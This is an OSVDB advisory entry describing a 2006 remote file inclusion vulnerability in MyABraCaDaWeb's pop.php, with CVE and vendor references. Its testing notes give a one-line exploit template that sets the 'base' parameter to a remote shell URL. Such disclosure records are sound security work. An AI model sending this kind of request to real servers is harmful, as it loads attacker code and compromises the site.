MyABraCaDaWeb pop.php base Variable Remote File Inclusion

2006-09-08T07:34:01
ID OSVDB:28749
Type osvdb
Reporter OSVDB
Modified 2006-09-08T07:34:01

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/pop.php?base=[shell]

References:

Vendor URL: http://www.webmaster-mag.net/ Secunia Advisory ID:21817 Related OSVDB ID: 28748 Mail List Post: http://attrition.org/pipermail/vim/2006-September/001027.html Generic Exploit URL: http://milw0rm.com/exploits/2335 FrSIRT Advisory: ADV-2006-3544 CVE-2006-4719 Bugtraq ID: 19944